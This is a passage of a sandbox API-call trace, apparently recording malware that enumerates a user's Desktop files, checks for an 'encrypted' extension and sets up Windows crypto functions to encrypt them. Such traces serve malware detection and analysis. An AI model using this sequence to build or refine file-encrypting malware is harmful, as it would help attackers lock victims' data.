lpString1="9f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hoG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oG0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iVXG.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0031.422] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.422] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.422] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.423] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0031.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.424] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.424] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0031.425] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.425] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\R99f_hoG0iVXG.xls", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f62b900, ftCreationTime.dwHighDateTime=0x1d5c31a, ftLastAccessTime.dwLowDateTime=0x5360f1c0, ftLastAccessTime.dwHighDateTime=0x1d5c17e, ftLastWriteTime.dwLowDateTime=0x5360f1c0, ftLastWriteTime.dwHighDateTime=0x1d5c17e, nFileSizeHigh=0x0, nFileSizeLow=0xf4c4, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="R99f_hoG0iVXG.xls", cAlternateFileName="R99F_H~1.XLS")) returned 0x7c2100 [0031.425] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.426] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.426] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0031.426] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.426] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.426] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.426] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.426] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.426] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.426] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.426] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.426] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0031.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0031.427] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.427] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.427] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0031.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.427] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0031.428] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.428] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.428] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.428] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.428] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.428] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0031.428] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.428] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.428] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.428] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.429] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.429] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.429] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.429] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: 